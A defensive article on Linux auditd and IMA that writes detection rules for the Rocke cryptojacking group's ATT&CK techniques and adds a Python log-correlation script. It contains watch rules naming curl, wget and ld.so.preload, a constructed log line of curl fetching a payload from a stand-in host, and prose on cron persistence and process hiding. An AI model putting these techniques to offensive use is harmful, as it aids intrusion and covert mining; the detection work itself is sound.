Better security auditing with Auditd and the Integrity Measurement Architecture
Visibility Logs
If IMA and auditd are configured correctly, events from the log can be sent to the SIEM or log management system. A full-featured log management system will make it easier to search and correlate information. It will certainly be a good way to react faster to suspicious events or attacks. Values for the file hash, path, UID, or GID can help to detect possible security issues related to the event.
Graylog is a centralized logging solution that allows the user to aggregate and search through logs. Graylog provides a means for storing logs at a centralized location. (Keeping all the logs in one place helps you identify the issues easily.) You can use Graylog to collect and analyze logs from various sources: operating systems, application servers, hardware, and software firewalls. Graylog also helps you monitor websites, web applications, and other areas of IT infrastructure.
Figure 1 shows an example of the same event that was generated when I launched the script script.sh.
Once everything is configured, you can monitor your system and also hunt for threats. It is worth writing your rules so that they catch the events that matter most. If you aren't sure which rules are the most useful for detecting threats, the MITRE ATT&CK framework is a good place to look.
Uncovering an Attack
The MITRE ATT&CK framework [3] is a knowledge base and model for documenting the life cycle and behavior of cyber attacks. The framework documents attacker tactics and techniques based on real-world observations. MITRE also helps to categorize adversary action and recommends specific ways of defending against an attack. The reports can vary in depth and insight – unfortunately, not all techniques are easily mapped.
If you know the details of how an attacker operates, it is much easier to search the audit log for evidence of an attack. MITRE is a good source for that preliminary attack information.
As an example, suppose you want to check whether the Rocke group has infiltrated your system. According to the MITRE website [4]:
Rocke is an alleged Chinese-speaking adversary whose primary objective appears to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency.
The group specializes in attacks on Linux systems.
MITRE ATT&CK assigns each technique its own ID. If you put that ID into the key (-k) of the auditd rule that detects the technique, every resulting audit event carries the ID, so you can tell at a glance which technique an alert concerns. The following rules map three of Rocke's documented techniques to auditd watches.
- T1140 Deobfuscate/Decode Files or Information
An alert carrying this ID in the key field of the auditd log entry points to the download stage. According to MITRE ATT&CK, Rocke has extracted tar.gz files after downloading them from a command and control server, and the group downloads payloads hosted on a legitimate website (Pastebin.com), using the curl or wget utilities to fetch them and a bash shell to execute them. Watching both downloaders for execution (-p x) catches that step:
-w /usr/bin/wget -p x -k T1140-Deobfuscate-Decode-Files-or-Information
-w /usr/bin/curl -p x -k T1140-Deobfuscate-Decode-Files-or-Information
On systems where curl and wget are used routinely, these two rules are noisy; the value is in correlating the event's PPID, UID, and arguments (the URL) downstream, not in the alert alone.
In the same step, the group uses base64 to decode its Base64-encoded commands back into their original form, so watch the decoder as well:
-w /usr/bin/base64 -p x -k T1140-Deobfuscate-Decode-Files-or-Information
The cryptocurrency miner itself is downloaded using shell scripts, curl, or wget from a location other than Pastebin. First, a config.json file containing the miner configuration is downloaded, and then the rest of the miner. Next the group downloads mining executables from its own Git repositories and saves them under the filename java or kworkerds in the /tmp, /var/tmp, or /dev/shm directory. Understanding this kind of behavior lets you write rules to detect it.
- T1053.003 Scheduled Task/Job: Cron
Rocke has installed a cron job that downloads and executes files from the command and control center.
Rocke creates cron jobs that persist on the victim's systems, which lets the attacker execute commands on a schedule without the need to be logged in. Rocke manipulates cron jobs, replacing the cron schedule and placing a malicious script in a folder that will execute hourly, daily, or weekly as part of existing cron jobs (Listing 3).
Listing 3
Tricks with Cron
-w /etc/cron.daily/ -p wa -k T1053.003-Scheduled-Task-Job-Cron
-w /etc/cron.hourly/ -p wa -k T1053.003-Scheduled-Task-Job-Cron
-w /etc/cron.monthly/ -p wa -k T1053.003-Scheduled-Task-Job-Cron
-w /etc/cron.weekly/ -p wa -k T1053.003-Scheduled-Task-Job-Cron
-w /var/spool/cron/crontabs/ -p wa -k T1053.003-Scheduled-Task-Job-Cron
Keys must not contain spaces, because auditctl splits a rule on whitespace. The spool path above is the Debian and Ubuntu location for user crontabs; on Red Hat-family systems it is /var/spool/cron/. The system-wide /etc/crontab and /etc/cron.d/ are worth watching with the same key.
- T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking
This alert shows that Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software from process lists. The group uses the open source tool libprocesshider, a shared object that the dynamic linker loads into every dynamically linked process and that filters the results of the hooked readdir() so that tools such as ps and top never see the miner. Rocke hides the process first and then executes a file that modifies /etc/ld.so.preload. Because the file is normally absent or empty, any write to it deserves an alert:
-w /etc/ld.so.preload -p wa -k T1574.006-Hijack-Execution-Flow-Dynamic-Linker-Hijacking
This information on the Rocke group makes it easy to search the audit log for a Rocke attack (refer to Listing 1). You can use the log to uncover:
- The path of the file that was executed and the path of its parent
- The PID and parent PID (PPID) of the executable
- The hash value of the file
- The UID, GID, and EUID of the process owner
You can then check whether the hash is already in a database of known-good values; if the recorded value for that path differs from the one IMA measured, the file has been altered since it was last measured.
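As an added example (not part of the original article or of any tool it describes), the following Python script does that correlation offline for the Rocke rules above: it parses raw audit records, groups them by event serial, pulls the ATT&CK technique ID out of the key set with -k, joins the SYSCALL record with the IMA INTEGRITY_RULE measurement of the same executable, and compares that hash against a known-good baseline. The log lines, the URL, and the baseline hashes are constructed for the example; the record types and field names are the ones auditd and IMA actually emit.

```python
"""Pull ATT&CK-keyed events out of an audit log and join them with IMA hashes.
Added example; the sample records and baseline hashes below are constructed."""
import re
from collections import defaultdict

# Constructed sample audit.log excerpt (not a real capture):
#  - two INTEGRITY_RULE records written by IMA when bash and curl were measured
#  - the execve() of curl caught by the T1140 watch rule (-w /usr/bin/curl -p x)
#  - a write to /etc/ld.so.preload caught by the T1574.006 watch rule
SAMPLE_LOG = """\
type=INTEGRITY_RULE msg=audit(1618415700.000:440): file="/usr/bin/bash" hash="sha256:7a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718293a4b5c6d7e8f9" ppid=1 pid=2030 auid=1000 uid=1000 gid=1000 euid=1000 comm="bash" exe="/usr/bin/bash"
type=INTEGRITY_RULE msg=audit(1618415742.101:455): file="/usr/bin/curl" hash="sha256:0f3c4b31e9d2a1c0a0b2f1a7d1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e" ppid=2030 pid=2044 auid=1000 uid=1000 gid=1000 euid=1000 comm="bash" exe="/usr/bin/bash"
type=SYSCALL msg=audit(1618415742.103:456): arch=c000003e syscall=59 success=yes exit=0 a0=55d0c1a0 a1=55d0c2b0 a2=55d0c3c0 a3=0 items=2 ppid=2030 pid=2044 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="curl" exe="/usr/bin/curl" key="T1140-Deobfuscate-Decode-Files-or-Information"
type=EXECVE msg=audit(1618415742.103:456): argc=3 a0="curl" a1="-s" a2="https://example.invalid/payload.tar.gz"
type=CWD msg=audit(1618415742.103:456): cwd="/tmp"
type=PATH msg=audit(1618415742.103:456): item=0 name="/usr/bin/curl" inode=131 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=PATH msg=audit(1618415742.103:456): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=23 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=SYSCALL msg=audit(1618415750.220:460): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=55d0c4d0 a2=241 a3=1b6 items=2 ppid=2030 pid=2051 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="bash" exe="/usr/bin/bash" key="T1574.006-Hijack-Execution-Flow-Dynamic-Linker-Hijacking"
type=PATH msg=audit(1618415750.220:460): item=0 name="/etc/" inode=2 dev=fd:00 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT
type=PATH msg=audit(1618415750.220:460): item=1 name="/etc/ld.so.preload" inode=9901 dev=fd:00 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=CREATE
"""

# Known-good hashes, e.g. exported from the package database or a golden
# image; constructed here. bash matches its measurement, curl does not.
BASELINE = {
    "/usr/bin/bash": "sha256:7a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718293a4b5c6d7e8f9",
    "/usr/bin/curl": "sha256:9b8a7c6d5e4f30211203a4b5c6d7e8f9a0b1c2d3e4f5061728394a5b6c7d8e9f",
}

REC_RE = re.compile(r"^type=(\S+) msg=audit\((\d+\.\d+):(\d+)\): (.*)$")
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
TECH_RE = re.compile(r"^(T\d{4}(?:\.\d{3})?)")   # technique or sub-technique ID
ARG_RE = re.compile(r"a\d+")


def parse_records(text):
    """Yield (type, serial, fields) for every audit record in text."""
    for line in text.splitlines():
        m = REC_RE.match(line.strip())
        if not m:
            continue
        rtype, _ts, serial, rest = m.groups()
        fields = {}
        for k, v in KV_RE.findall(rest):
            if v.startswith('"'):
                v = v[1:-1]
            elif (rtype == "EXECVE" and ARG_RE.fullmatch(k)
                  and len(v) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", v)):
                # auditd hex-encodes argv entries containing spaces or control characters
                v = bytes.fromhex(v).decode("utf-8", "replace")
            fields[k] = v
        yield rtype, int(serial), fields


def correlate(text, baseline):
    """Return one finding per event whose key carries an ATT&CK technique ID."""
    events, measured = defaultdict(list), {}
    for rtype, serial, f in parse_records(text):
        if rtype == "INTEGRITY_RULE" and "file" in f and "hash" in f:
            measured[f["file"]] = f["hash"]      # IMA records have their own serials
        else:
            events[serial].append((rtype, f))
    findings = []
    for serial, recs in sorted(events.items()):
        sysc = next((f for t, f in recs if t == "SYSCALL"), None)
        if sysc is None or not TECH_RE.match(sysc.get("key", "")):
            continue
        argv = []
        for t, f in recs:
            if t == "EXECVE":
                keys = sorted((k for k in f if ARG_RE.fullmatch(k)), key=lambda k: int(k[1:]))
                argv = [f[k] for k in keys]
        exe = sysc.get("exe")
        ima_hash, known = measured.get(exe), baseline.get(exe)
        if ima_hash is None:
            status = "not-measured"
        elif known is None:
            status = "no-baseline"
        else:
            status = "match" if ima_hash == known else "MISMATCH"
        findings.append({
            "serial": serial,
            "technique": TECH_RE.match(sysc["key"]).group(1),
            "key": sysc["key"],
            "exe": exe, "argv": argv,
            "paths": [f["name"] for t, f in recs if t == "PATH" and "name" in f],
            "pid": sysc.get("pid"), "ppid": sysc.get("ppid"),
            "uid": sysc.get("uid"), "gid": sysc.get("gid"), "euid": sysc.get("euid"),
            "ima_hash": ima_hash, "hash_status": status,
        })
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_LOG, BASELINE):
        print(f"{f['technique']:<10} pid={f['pid']} ppid={f['ppid']} uid={f['uid']} "
              f"euid={f['euid']} exe={f['exe']} hash={f['hash_status']} "
              f"argv={' '.join(f['argv'])} paths={f['paths']}")
```

The join between the auditd event and the IMA measurement is done on the executable path because the two records carry different serial numbers; on a real log, feed the script the output of ausearch --raw so that multi-line events arrive intact, and replace the baseline dictionary with hashes taken from your package manager or a golden image.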
Conclusion
IMA, together with auditd, can certainly help you protect your systems. Of course, this setup won't cover every attack surface, but being able to recognize hashes and expose attack techniques helps you detect threats faster. Beyond faster recognition, both the IMA policy and the audit rules can be tailored to your environment. As the Rocke group example shows, you can use the Linux auditing system to discover techniques and tools that might indicate an attack.